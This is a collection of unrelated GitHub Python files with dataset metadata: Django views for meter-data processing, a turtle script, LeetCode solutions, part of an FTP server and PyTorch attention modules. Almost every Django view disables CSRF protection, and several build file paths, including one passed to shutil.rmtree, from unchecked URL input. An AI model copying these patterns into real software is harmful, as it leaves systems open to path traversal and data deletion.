except Exception as e :\n return HttpResponse(json.dumps([str(e)]), content_type='application/json',status=500)\n\n\n@csrf_exempt\ndef getValidatedFile(request,meter_id):\n\n print(\"inside getValidatedFile\")\n print(meter_id)\n\n validatedFile = list(filter(lambda validatedFile: (validatedFile.validatedFileMeterId() == meter_id),ValidatedFile.objects.all()))\n \n validatedFile_json = serializers.serialize(\"json\", validatedFile)\n # data = {\"data\": AllMeterFiles_json}\n # return JsonResponse(data)\n return HttpResponse(validatedFile_json, content_type=\"text/json-comment-filtered\")\n\n\n@csrf_exempt\ndef downloadValidatedFile(request,validatedFile_id):\n\n print(\"inside downloadValidatedFile\")\n\n print(validatedFile_id)\n validatedFile = ValidatedFile.objects.get(id=int(validatedFile_id))\n\n\n outputFile_path = os.path.join(settings.MEDIA_ROOT,validatedFile.filePath)\n print(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"text/plain\")\n response['Content-Disposition'] = 'attachment; filename=' + validatedFile.fileName\n return response\n\n return HttpResponse(\"There is no Validated File to download\")\n\n@csrf_exempt\ndef changeValidatedFile(request,validatedFile_id):\n\n print(\"inside changeValidatedFile\")\n\n print(request.FILES['fileToUpload'])\n validatedFileToChange = ValidatedFile.objects.get(id = validatedFile_id)\n validatedFileToChange.validatedFile = request.FILES['fileToUpload']\n validatedFileToChange.save()\n print(validatedFile_id)\n return HttpResponse({'message': 'Validated File Changed'}, status=200)\n\n\n############################## Create Real Meter MWH #################################################################\n\n@csrf_exempt\ndef getRealMeterMWHData(request, meter_id): # Data of single meter\n\n print(\"inside getRealMeterMWHData\")\n print(meter_id)\n\n realMeterMWHFiles = list(filter(lambda realMeterMWHFile: (realMeterMWHFile.realMeterMWHFileMeterId() == meter_id),RealMeterMWHFile.objects.all()))\n # realMeterMWHFile = realMeterMWHFiles[0]\n # mwhDict = json.loads(realMeterMWHFile.mwhDictionary)\n # print(mwhDict[\"1\"])\n realMeterMWHFiles_json = serializers.serialize(\"json\", realMeterMWHFiles , fields=('dirStructureRealMWH','meterFile'))\n # data = {\"data\": AllMeterFiles_json}\n # return JsonResponse(data)\n return HttpResponse(realMeterMWHFiles_json, content_type=\"text/json-comment-filtered\")\n\n\n@csrf_exempt\ndef realMeterMWH(request,meter_id,overWrite):\n # try :\n print(meter_id)\n if(overWrite == \"false\") :\n print(\"Keep file as it is\")\n else :\n shutil.rmtree(os.path.join(\"fifteenmmdp/media/meterFile\",\"meterFile\"+meter_id,\"Real Meter MWH Files(Copy)\"))\n print(\"overwrite the files\")\n print(type(overWrite))\n meterFile = AllMeterFiles.objects.get(id=int(meter_id))\n print(meterFile.status)\n createRealMeterMWH(path = \"meterFile\"+meter_id, _meterData = meterFile, overWrite = overWrite) #Path given\n return HttpResponse({'message': 'Real Meter MWH Created'}, status=200)\n # except Exception as e :\n # return HttpResponse(json.dumps([str(e)]), content_type='application/json',status=500)\n\n@csrf_exempt\ndef downloadRealMeterMWHFile(request,meter_id,realMeterMWH_id): # Single File only\n\n print(\"inside downloadRealMeterMWHFile\")\n print(realMeterMWH_id)\n # realMeterMWHFile = RealMeterMWHFile.objects.get(id=int(realMeterMWH_id))\n\n realMeterMWHFiles = list(filter(lambda realMeterMWHFile: (realMeterMWHFile.realMeterMWHFileMeterId() == meter_id),RealMeterMWHFile.objects.all()))\n realMeterMWHFile = realMeterMWHFiles[0]\n mwhDict = json.loads(realMeterMWHFile.mwhDictionary)\n\n outputFile_path = os.path.join(settings.MEDIA_ROOT,mwhDict[realMeterMWH_id])\n print(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"text/plain\")\n response['Content-Disposition'] = 'attachment; filename=' + os.path.basename(mwhDict[realMeterMWH_id])\n return response\n\n return HttpResponse(\"There is no Real Meter MWH File to download\")\n\n\n@csrf_exempt\ndef changeRealMeterMWHFile(request,meter_id,realMeterMWH_id):\n\n print(\"inside changeRealMeterMWHFile\")\n print(realMeterMWH_id)\n\n print(request.FILES['fileToUpload'])\n myfile = request.FILES['fileToUpload']\n # realMeterMWHFileToChange = RealMeterMWHFile.objects.get(id = realMeterMWH_id)\n print(myfile)\n print(myfile.name)\n realMeterMWHFiles = list(filter(lambda realMeterMWHFile: (realMeterMWHFile.realMeterMWHFileMeterId() == meter_id),RealMeterMWHFile.objects.all()))\n realMeterMWHFile = realMeterMWHFiles[0]\n mwhDict = json.loads(realMeterMWHFile.mwhDictionary)\n print(mwhDict[realMeterMWH_id])\n # useThisLoc = 'fifteenmmdp/media'+mwhDict[realMeterMWH_id]\n useThisLoc = mwhDict[realMeterMWH_id]\n\n fs = OverwriteStorage()\n fs.save(useThisLoc, myfile)\n # realMeterMWHFileToChange.npcFile = request.FILES['fileToUpload']\n # realMeterMWHFileToChange.save()\n return HttpResponse({'message': 'RealMeterMWHFile Changed'}, status=200)\n\n@csrf_exempt\ndef downLoadFullRealMeterMWHFiles(request,meter_id):\n print(\"inside downLoadFullRealMeterMWHFiles\")\n print(meter_id)\n\n path = os.path.join(settings.MEDIA_ROOT,'meterFile/meterFile'+meter_id)\n inputFile_path = os.path.join(path,'Real Meter MWH Files')\n outputFile_path = os.path.join(path,'Real_Meter_MWH.zip')\n\n shutil.make_archive(os.path.splitext(outputFile_path)[0], 'zip', inputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"application/force-download\")\n response['Content-Disposition'] = 'attachment; filename=' + 'Real_Meter_MWH.zip'\n return response\n\n return HttpResponse(\"There is no Real Meter MWH File to download\")\n\n@csrf_exempt\ndef fetchFrequencyGraphData(request, meter_id) :\n print(\"i am in fetchFrequencyGraphData\")\n\n frequencyGraphDataToSend = frequencyGraphData(path = \"meterFile\"+meter_id) \n # print(frequencyGraphDataToSend)\n return HttpResponse(json.dumps(frequencyGraphDataToSend))\n############################## Create Fictitious Meter MWH #################################################################\n\n@csrf_exempt\ndef getFictMeterMWHData(request, meter_id): # Data of single meter\n\n print(\"inside getFictMeterMWHData\")\n print(meter_id)\n\n fictMeterMWHFiles = list(filter(lambda fictMeterMWHFile: (fictMeterMWHFile.fictMeterMWHFileMeterId() == meter_id),FictMeterMWHFile.objects.all()))\n # fictMeterMWHFile = fictMeterMWHFiles[0]\n # fictMwhDict = json.loads(fictMeterMWHFile.fictMwhDictionary)\n # print(fictMwhDict[\"1\"])\n fictMeterMWHFiles_json = serializers.serialize(\"json\", fictMeterMWHFiles , fields=('dirStructureFictMWH','meterFile'))\n # data = {\"data\": AllMeterFiles_json}\n # return JsonResponse(data)\n return HttpResponse(fictMeterMWHFiles_json, content_type=\"text/json-comment-filtered\")\n\n\n@csrf_exempt\ndef fictMeterMWH(request,meter_id):\n # try :\n print(meter_id)\n meterFile = AllMeterFiles.objects.get(id=int(meter_id))\n print(meterFile.status)\n createFictMeterMWH(path = \"meterFile\"+meter_id, _meterData = meterFile) #Path given\n return HttpResponse({'message': 'Fict Meter MWH Created'}, status=200)\n # except Exception as e :\n # return HttpResponse(json.dumps([str(e)]), content_type='application/json',status=500)\n\n@csrf_exempt\ndef downloadFictMeterMWHFile(request,meter_id,fictMeterMWH_id): # Single File only\n\n print(\"inside downloadFictMeterMWHFile\")\n print(fictMeterMWH_id)\n # fictMeterMWHFile = FictMeterMWHFile.objects.get(id=int(fictMeterMWH_id))\n\n fictMeterMWHFiles = list(filter(lambda fictMeterMWHFile: (fictMeterMWHFile.fictMeterMWHFileMeterId() == meter_id),FictMeterMWHFile.objects.all()))\n fictMeterMWHFile = fictMeterMWHFiles[0]\n fictMwhDict = json.loads(fictMeterMWHFile.fictMwhDictionary)\n\n outputFile_path = os.path.join(settings.MEDIA_ROOT,fictMwhDict[fictMeterMWH_id])\n print(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"text/plain\")\n response['Content-Disposition'] = 'attachment; filename=' + os.path.basename(fictMwhDict[fictMeterMWH_id])\n return response\n\n return HttpResponse(\"There is no Fict Meter MWH File to download\")\n\n\n@csrf_exempt\ndef changeFictMeterMWHFile(request,meter_id,fictMeterMWH_id):\n\n print(\"inside changeFictMeterMWHFile\")\n print(fictMeterMWH_id)\n\n print(request.FILES['fileToUpload'])\n myfile = request.FILES['fileToUpload']\n # realMeterMWHFileToChange = RealMeterMWHFile.objects.get(id = realMeterMWH_id)\n print(myfile)\n print(myfile.name)\n fictMeterMWHFiles = list(filter(lambda fictMeterMWHFile: (fictMeterMWHFile.fictMeterMWHFileMeterId() == meter_id),FictMeterMWHFile.objects.all()))\n fictMeterMWHFile = fictMeterMWHFiles[0]\n fictMwhDict = json.loads(fictMeterMWHFile.fictMwhDictionary)\n print(fictMwhDict[fictMeterMWH_id])\n # useThisLoc = 'fifteenmmdp/media'+fictMwhDict[fictMeterMWH_id]\n useThisLoc = fictMwhDict[fictMeterMWH_id]\n\n fs = OverwriteStorage()\n fs.save(useThisLoc, myfile)\n # realMeterMWHFileToChange.npcFile = request.FILES['fileToUpload']\n # realMeterMWHFileToChange.save()\n return HttpResponse({'message': 'FictMeterMWHFile Changed'}, status=200)\n\ndef downLoadFullFictMeterMWHFiles(request,meter_id):\n print(\"inside downLoadFullFictMeterMWHFiles\")\n print(meter_id)\n\n path = os.path.join(settings.MEDIA_ROOT,'meterFile/meterFile'+meter_id)\n inputFile_path = os.path.join(path,'Fictitious Meter MWH Files')\n outputFile_path = os.path.join(path,'Fictitious_Meter_MWH.zip')\n\n shutil.make_archive(os.path.splitext(outputFile_path)[0], 'zip', inputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"application/force-download\")\n response['Content-Disposition'] = 'attachment; filename=' + 'Fictitious_Meter_MWH.zip'\n return response\n\n return HttpResponse(\"There is no Fictitious Meter MWH File to download\")\n\n############################## Create Final Output Files #################################################################\n\n\n@csrf_exempt\ndef getFinalOutputData(request, meter_id): # Data of single meter\n\n print(\"inside getFinalOutputData\")\n print(meter_id)\n\n finalOutputFiles = list(filter(lambda finalOutputFile: (finalOutputFile.finalOutputFileMeterId() == meter_id),FinalOutputFile.objects.all()))\n \n finalOutputFiles_json = serializers.serialize(\"json\", finalOutputFiles , fields=('dirStructureFinalOutput','meterFile'))\n # data = {\"data\": AllMeterFiles_json}\n # return JsonResponse(data)\n return HttpResponse(finalOutputFiles_json, content_type=\"text/json-comment-filtered\")\n\n\n@csrf_exempt\ndef finalOutput(request,meter_id):\n try :\n print(meter_id)\n meterFile = AllMeterFiles.objects.get(id=int(meter_id))\n print(meterFile.status)\n createFinalOutput(path = \"meterFile\"+meter_id, _meterData = meterFile) #Path given\n return HttpResponse({'message': 'Final Output Created'}, status=200)\n except Exception as e :\n return HttpResponse(json.dumps([str(e)]), content_type='application/json',status=500)\n\n@csrf_exempt\ndef downloadFinalOutputFile(request,meter_id,finalOutput_id): # Single File only\n\n print(\"inside downloadFinalOutputile\")\n print(finalOutput_id)\n\n finalOutputFiles = list(filter(lambda finalOutputFile: (finalOutputFile.finalOutputFileMeterId() == meter_id),FinalOutputFile.objects.all()))\n finalOutputFile = finalOutputFiles[0]\n finalOutputDict = json.loads(finalOutputFile.finalOutputDictionary)\n\n outputFile_path = os.path.join(settings.MEDIA_ROOT,finalOutputDict[finalOutput_id])\n print(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"text/plain\")\n response['Content-Disposition'] = 'attachment; filename=' + os.path.basename(finalOutputDict[finalOutput_id])\n return response\n\n return HttpResponse(\"There is no Final Output File to download\")\n\n\n@csrf_exempt\ndef changeFinalOutputFile(request,meter_id,finalOutput_id):\n\n print(\"inside changeFinalOutputFile\")\n print(finalOutput_id)\n\n print(request.FILES['fileToUpload'])\n myfile = request.FILES['fileToUpload']\n\n print(myfile)\n print(myfile.name)\n\n finalOutputFiles = list(filter(lambda finalOutputFile: (finalOutputFile.finalOutputFileMeterId() == meter_id),FinalOutputFile.objects.all()))\n finalOutputFile = finalOutputFiles[0]\n finalOutputDict = json.loads(finalOutputFile.finalOutputDictionary)\n print(finalOutputDict[finalOutput_id])\n # useThisLoc = 'fifteenmmdp/media'+finalOutputDict[finalOutput_id]\n useThisLoc = finalOutputDict[finalOutput_id]\n\n fs = OverwriteStorage()\n fs.save(useThisLoc, myfile)\n # realMeterMWHFileToChange.npcFile = request.FILES['fileToUpload']\n # realMeterMWHFileToChange.save()\n return HttpResponse({'message': 'Final Output File Changed'}, status=200)\n\n@csrf_exempt\ndef downLoadFullFinalOutputFiles(request,meter_id):\n print(\"inside downLoadFullFinalOutputFiles\")\n print(meter_id)\n\n path = os.path.join(settings.MEDIA_ROOT,'meterFile/meterFile'+meter_id)\n inputFile_path = os.path.join(path,'Final Output Files')\n outputFile_path = os.path.join(path,'Final_Output.zip')\n\n shutil.make_archive(os.path.splitext(outputFile_path)[0], 'zip', inputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"application/force-download\")\n response['Content-Disposition'] = 'attachment; filename=' + 'Final_Output.zip'\n return response\n\n return HttpResponse(\"There is no Final Output File to download\")\n\n############################## Analyse data #################################################################\n@csrf_exempt\ndef analyseData(request,meter_id):\n try :\n print(\"Analyse data\")\n\n with open(\"fifteenmmdp/media/meterFile/meterFile\" + str(meter_id) +\"/NPC Files/Necessary Files Local Copy/GraphConfiguration.xlsx\", \"rb\") as f: # input the .xlsx\n data = pd.read_excel(f,sheet_name=None,engine='openpyxl')\n f.close()\n\n stateWiseFeederDetails = {}\n\n print(len(data.keys()))\n for key in data.keys() :\n data[key] = data[key].fillna(\"Meter not specified\")\n stateWiseFeederDetails[key] = []\n # print(data[key])\n\n # stateWiseFeederDetails = {'BIHAR' : [] , 'WEST BENGAL' : [] , 'GRIDCO' : [] , 'DVC' : [] , 'SIKKIM' : [] , 'JHARKHAND' : []}\n entities = stateWiseFeederDetails.keys()\n\n for entity in entities :\n for index, row in data[entity].iterrows():\n feederObject = {'id' : row['SL NO'] , 'Feeder Name' : row['Feeder Name'] , 'End1' : row['End1'], 'End2' : row['End2'] }\n stateWiseFeederDetails[entity].append(feederObject)\n \n # with open(r'fifteenmmdp/media/necessaryFiles/Graph Configuration.xlsx', \"rb\") as f: # input the .xlsx\n # data = pd.read_excel(f,sheet_name=\"WEST BENGAL\",engine='openpyxl')\n # f.close()\n # print(data)\n\n \n # for index, row in data.iterrows():\n # feederObject = {'id' : row['SL NO'] , 'Feeder Name' : row['Feeder Name'] , 'End1' : row['End1'], 'End2' : row['End2'] }\n # stateWiseFeederDetails['WEST BENGAL'].append(feederObject)\n\n # print(stateWiseFeederDetails)\n return HttpResponse(json.dumps(stateWiseFeederDetails), content_type=\"application/json\")\n\n # return HttpResponse({'message': 'ANALYSE DATA'}, status=200)\n except Exception as e :\n print(str(e))\n return HttpResponse(json.dumps([str(e)]), content_type='application/json',status=500)\n\n@csrf_exempt\ndef fetchGraphData(request,meter_id,end1,end2,polarity):\n print(meter_id)\n print(end1)\n print(end2)\n print(polarity)\n graphData = fetchData(meter_id,end1,end2,polarity)\n return HttpResponse(json.dumps(graphData), content_type='application/json') \n\n@csrf_exempt\ndef fetchGraphDataExcel(request,meter_id,end1,end2,polarity):\n print(meter_id)\n print(end1)\n print(end2)\n print(polarity)\n graphData = fetchData(meter_id,end1,end2,polarity)\n # return HttpResponse(json.dumps(graphData), content_type='application/json')\n # graphData = {'end1Data' : end1Data ,'end2Data' : end2Data , 'xAxisData' : xAxisData , 'diff' : endDifference(end2Data,end1Data), 'diffPercentage' : endDifferencePercentage(end2Data,end1Data)}\n\n \n meterFileMainFolder = os.path.join(settings.MEDIA_ROOT,\"meterFile\",\"meterFile\"+meter_id)\n\n print(\"inside fetchGraphDataExcel\")\n\n graphDataExcel = {}\n\n graphDataExcel['Date'] = [item.split()[0] for item in graphData['xAxisData']]\n graphDataExcel['Timestamp'] = [item.split()[1] for item in graphData['xAxisData']]\n\n graphDataExcel[end1] = graphData['end1Data']\n graphDataExcel[end2] = graphData['end2Data']\n graphDataExcel['Difference'] = graphData['diff']\n graphDataExcel['Difference Percentage'] = graphData['diffPercentage']\n\n\n dfExcel = pd.DataFrame.from_dict(graphDataExcel)\n\n if(not os.path.exists(meterFileMainFolder + '/Pair Comparison')) :\n os.mkdir(meterFileMainFolder + '/Pair Comparison')\n\n outputFile_path = os.path.join(meterFileMainFolder,'Pair Comparison',end1 +\" vs \" + end2 +\".xlsx\")\n\n dfExcel.to_excel(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"application/force-download\")\n response['Content-Disposition'] = 'attachment; filename=' + end1 + \" vs \" + end2 +\".xlsx\"\n return response\n\n return HttpResponse(\"There is no File to download\")\n\n@csrf_exempt\ndef fetchMeterChangeLog(request,meter_id):\n print(meter_id)\n \n meterFileMainFolder = os.path.join(settings.MEDIA_ROOT,\"meterFile\",\"meterFile\"+meter_id)\n\n print(\"inside fetchMeterChangeLog\")\n \n outputFile_path = os.path.join(meterFileMainFolder,'ChangeLog.txt')\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type='application/text charset=utf-8')\n response['Content-Disposition'] = 'attachment; filename= \"ChangeLog.txt\"'\n return response\n\n return HttpResponse(\"No change has been done yet.\")\n\n\n\n@csrf_exempt\ndef fetchDateInfo(request,meter_id):\n print(\"this is fetchDateInfo\")\n print(meter_id)\n\n meterData = AllMeterFiles.objects.get(id=int(meter_id))\n\n # One day is substracted because Real Meter MWH Files only got created for these days.\n dateInformation = {'startDate' : str(meterData.startDate) , 'endDate' : str(meterData.endDate - timedelta(days=1))}\n \n return HttpResponse(json.dumps(dateInformation), content_type=\"text/json-comment-filtered\")\n\n@csrf_exempt\ndef zeroFillMeterEndData(request,meter_id):\n print(\"inside zeroFillMeterEndData\")\n\n meterEndToZeroFill = request.POST['meterEndToReplace']\n print(meterEndToZeroFill)\n print(meter_id)\n\n meterFile = AllMeterFiles.objects.get(id=int(meter_id))\n\n zeroFillMeterError = zeroFillMeter(\"meterFile\"+meter_id ,meterFile ,meterEndToZeroFill)\n changeLog = \"Unavailable data for \" + meterEndToZeroFill + \" is filled with Zero\"\n\n meterChangeLog('fifteenmmdp\\media\\meterFile\\meterFile' + str(meter_id) + '\\ChangeLog.txt', changeLog)\n\n return HttpResponse(\"Success\")\n\n\n\n@csrf_exempt\ndef changeMeterEndData(request,meter_id):\n startDate = request.POST['startDate']\n endDate = request.POST['endDate']\n meterEndToReplace = request.POST['meterEndToReplace']\n equationToReplaceWith = request.POST['equationToReplaceWith']\n changeMeterError = changeMeterEndDataWithEquation(\"meterFile\"+meter_id ,startDate,endDate,meterEndToReplace,equationToReplaceWith)\n print(startDate)\n changeLog = meterEndToReplace + \" is replaced with \" + equationToReplaceWith + \" from timestamp \" + startDate + \" to timestamp \" + endDate\n\n meterChangeLog('fifteenmmdp\\media\\meterFile\\meterFile' + str(meter_id) + '\\ChangeLog.txt', changeLog)\n return HttpResponse(\"Success\")\n\n\n@csrf_exempt\ndef revertMeterEndData(request,meter_id):\n meterEndToReplace = request.POST['meterEndToReplace']\n print(meterEndToReplace)\n print(meter_id)\n print(\"inside revertMeterEndData\")\n revertMeterEndChangesError = revertMeterEndChanges(\"meterFile\"+meter_id ,meterEndToReplace)\n changeLog = \"All the changes done on \" + meterEndToReplace + \" has been Reverted Back.\"\n\n meterChangeLog('fifteenmmdp\\media\\meterFile\\meterFile' + str(meter_id) +'\\ChangeLog.txt', changeLog)\n return HttpResponse(\"Success\")\n\n@csrf_exempt\ndef componentWiseAnalysis(request,meter_id):\n meterEndToAnalyse = request.POST['meterEndToAnalyse']\n print(meterEndToAnalyse)\n print(meter_id)\n print(\"inside componentWiseAnalysis\")\n componentWiseGraphData = componentWiseMeterAnalysis(\"meterFile\"+meter_id ,meterEndToAnalyse)\n\n return HttpResponse(json.dumps(componentWiseGraphData), content_type='application/json')\n\n@csrf_exempt\ndef componentWiseExcelData(request,meter_id,meterEndToExcelData):\n \n meterFileMainFolder = os.path.join(settings.MEDIA_ROOT,\"meterFile\",\"meterFile\"+meter_id)\n\n # meterEndToExcelData = request.POST['meterEndToExcelData']\n print(meterEndToExcelData)\n print(meter_id)\n print(\"inside componentWiseAnalysis\")\n componentWiseGraphData = componentWiseMeterAnalysis(\"meterFile\"+meter_id ,meterEndToExcelData)\n\n downloadExcelData = {}\n\n downloadExcelData['Date'] = [item.split()[0] for item in componentWiseGraphData[0]['x']]\n downloadExcelData['Timestamp'] = [item.split()[1] for item in componentWiseGraphData[0]['x']]\n\n for componentData in componentWiseGraphData :\n downloadExcelData[componentData['name']] = componentData['y']\n\n dfExcel = pd.DataFrame.from_dict(downloadExcelData)\n\n if(not os.path.exists(meterFileMainFolder + '/Component-Wise Excel Data')) :\n os.mkdir(meterFileMainFolder + '/Component-Wise Excel Data')\n\n outputFile_path = os.path.join(meterFileMainFolder,'Component-Wise Excel Data',meterEndToExcelData+\".xlsx\")\n\n dfExcel.to_excel(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"application/force-download\")\n response['Content-Disposition'] = 'attachment; filename=' + meterEndToExcelData+\".xlsx\"\n return response\n\n return HttpResponse(\"There is no File to download\")\n\n############################## Special Reports #################################################################\n\n@csrf_exempt\ndef specialReports(request,meter_id):\n print(meter_id)\n print(\"inside specialReports\")\n threshold = request.POST['threshold']\n print(threshold)\n if(not isFloat(threshold)) :\n threshold = 0.5\n specialReport1Data = specialReport1(\"meterFile\"+meter_id,meter_id, float(threshold))\n\n return HttpResponse(json.dumps(specialReport1Data), content_type='application/json')\n\n############################## Necessary Files #################################################################\n\n@csrf_exempt\ndef getNecessaryFiles(request) :\n # necessaryFiles_json = serializers.serialize(\"json\", necessaryFiles)\n # return HttpResponse(json.dumps(necessaryFiles), content_type=\"application/json\")\n\n NecessaryFiles_json = serializers.serialize(\"json\", NecessaryFile.objects.all())\n\n return HttpResponse(NecessaryFiles_json, content_type=\"text/json-comment-filtered\")\n\n\n@csrf_exempt\ndef downLoadNecessaryFile(request,necessaryFileId_id):\n print(\"inside downLoadNecessaryFile\")\n print(necessaryFileId_id)\n\n necessaryFile = NecessaryFile.objects.get(id=int(necessaryFileId_id))\n\n outputFile_path = os.path.join(settings.MEDIA_ROOT,necessaryFile.filePath)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"application/force-download\")\n response['Content-Disposition'] = 'attachment; filename=' + necessaryFile.fileName\n return response\n\n return HttpResponse(\"There is no File to download\")\n\n@csrf_exempt\ndef changeNecessaryFile(request,necessaryFileId_id):\n print(\"does work\")\n print(request.POST['subTitle'])\n print(request.POST['description'])\n print(request.FILES['necessaryFile'])\n necessaryFile = NecessaryFile.objects.get(id=int(necessaryFileId_id))\n necessaryFile.subTitle = request.POST['subTitle']\n necessaryFile.description = request.POST['description']\n necessaryFile.necessaryFile = request.FILES['necessaryFile']\n necessaryFile.save()\n return HttpResponse({'message': 'Necessary File updated '}, status=200)\n\n\n\n\n ","repo_name":"Pritam723/mdp-back-end","sub_path":"mdp/fifteenmmdp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":41075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38179541993","text":"import turtle\r\n\r\ntao = turtle.Pen()\r\ntao.shape('turtle')\r\nimport random\r\n\r\n\r\ndef color():\r\n C1 = ['red','orenge','yellow','green','blue','purple']\r\n C2 = random.choice(C1)\r\n tao.color(C2)\r\n\r\n \r\ndef go():\r\n tao.penup()\r\n x = random.randint(-150,150)\r\n y = random.randint(-150,150)\r\n tao.goto(x,y)\r\n tao.pendown()\r\n\r\n \r\ndef pen():\r\n for i in range(4):\r\n tao.forward(100)\r\n tao.left(90)\r\n\r\n \r\n\r\ndef all ():\r\n color()\r\n go()\r\n pen()\r\n\r\ntao.mainloop()","repo_name":"singkorn1189/Deang","sub_path":"turtle2.py","file_name":"turtle2.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38571294679","text":"class Solution:\n def numberOfSubarrays(self, nums: List[int], k: int) -> int:\n arr=[0]\n\n cnt=0\n n=len(nums)\n for i in range(n):\n nums[i]=nums[i]%2\n if nums[i]%2==1:\n arr.append(i)\n arr.append(n)\n \n print(arr)\n \n m=len(arr)\n for i in range(1,m-1):\n if i+k 1):\n print(args[1])\n else:\n print('Current dir')\n resp = self.dtp.listDir(self.dir + \"/\" + self.userName)\n \n if (not resp):\n reply = \"550 No files in directory\"\n self.sock.send(reply.encode())\n\n\n def quitProgram(self, args):\n self.active = False\n print(\"Closing connection with \" + self.address[0])\n reply = \"200 Closing connection\\r\\n\"\n self.sock.send(reply.encode())\n return\n\n def handleCommands(self):\n while(self.active):\n data = self.sock.recv(4096)\n decodeData = str(bytes.decode(data))\n clientComm = decodeData.lower()\n clientComm = clientComm.split()\n\n try:\n print(clientComm)\n self.com[clientComm[0]](clientComm)\n except:\n reply = \"500 Command not recognised\\r\\n\"\n self.sock.send(reply.encode())\n\n return\n\nclass serverPi():\n def __init__(self):\n self.port = 21 \n self.address = \"localhost\"\n self.sock = None\n\n signal.signal(signal.SIGINT, self.exitHandler)\n\n def exitHandler(self, sig, frame):\n print(\"\\nServer stopping...\")\n if (self.sock):\n self.sock.close()\n sys.exit(0)\n return\n\n\n def listen(self):\n print(\"Server starting...\")\n\n try:\n self.sock = socket.socket()\n self.sock.bind((self.address, self.port))\n\n print(\"Server started on port: \" + str(self.port))\n\n self.sock.listen()\n\n threads = []\n threadCount = -1\n except:\n print(\"Error: Could not create socket to listen for connections\")\n\n while (True and self.sock) :\n\n clientSock, clientAddress = self.sock.accept()\n\n if clientSock:\n # new thread for this client\n threads.append(serverPiThread(clientSock, clientAddress))\n threadCount += 1\n threads[threadCount].start()\n \n print(\"Server stopping...\")\n\n if self.sock:\n self.sock.close()\n\n return\n\n\n def user(self):\n print(\"worked\")\n pass\n","repo_name":"RC-7/FTP","sub_path":"serverPi.py","file_name":"serverPi.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40195207334","text":"from Downloader import Downloader\nfrom Builder import Builder\nfrom Utils import loadconfig\nfrom Controller import Controller\n\n\n\n\n\nif __name__ == '__main__':\n# -----------------load config--------------------\n configpath = \"Config/config.json\"\n configs = loadconfig(configpath)\n dir_config = configs[\"Dir\"]\n file_config = configs[\"File\"]\n# -----------------create classes--------------\n builder = Builder(configpath)\n downloader = Downloader(dir_config[\"Save_Path\"])\n controller = Controller(file_config[\"MusicList\"])\n# ------------------------------------------\n controller = controller.init(downloader,builder)\n controller.AutoDownload()","repo_name":"ctlyz123/MusicDownload","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10492227334","text":"class Solution:\n # Time: O(n^2)\n # Space: O(1)\n def maxProfit(self, prices: List[int]) -> int:\n max_profit = 0\n for i in range(len(prices)):\n for j in range(i + 1, len(prices)):\n buy = prices[i]\n sell = prices[j]\n max_profit = max(max_profit, sell - buy)\n return max_profit\n\n # Time: O(n) \n # Space: O(1)\n def maxProfit(self, prices: List[int]) -> int:\n profit = 0\n min_price = prices[0]\n for i in range(1, len(prices)):\n profit = max(profit, prices[i] - min_price)\n min_price = min(min_price, prices[i])\n return profit\n","repo_name":"ThinkSmall98/Neetcode_150_Python_Solutions_Personal","sub_path":"sliding_window/best_time_to_buy&sell_stock.py","file_name":"best_time_to_buy&sell_stock.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8992006347","text":"#Basic Modules\n\n#Pytorch\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.parameter import Parameter\n\n\nclass SE(nn.Module):\n def __init__(self, in_channels, reduction_ratio):\n super().__init__()\n self.pool = nn.AdaptiveAvgPool2d(1)\n self.fc1 = nn.Linear(in_channels, in_channels//reduction_ratio, bias = True)\n self.relu = nn.ReLU(inplace = True)\n self.fc2 = nn.Linear(in_channels//reduction_ratio, in_channels, bias = True)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n b, c, _, _ = x.size()\n out = self.pool(x).view(b, c)\n out = self.fc1(out)\n out = self.relu(out)\n out = self.fc2(out)\n out = self.sigmoid(out).view(b, c, 1, 1)\n return x * out.expand_as(x)\n\nclass SRM(nn.Module):\n def __init__(self, in_channels):\n super().__init__()\n self.cfc = Parameter(torch.Tensor(in_channels, 2))\n self.cfc.data.fill_(0)\n self.bn = nn.BatchNorm2d(in_channels)\n self.activation = nn.Sigmoid()\n\n def _style_pooling(self, x, eps=1e-5):\n N, C, _, _ = x.size()\n channel_mean = x.view(N, C, -1).mean(dim=2, keepdim=True)\n channel_var = x.view(N, C, -1).var(dim=2, keepdim=True) + eps\n channel_std = channel_var.sqrt()\n t = torch.cat((channel_mean, 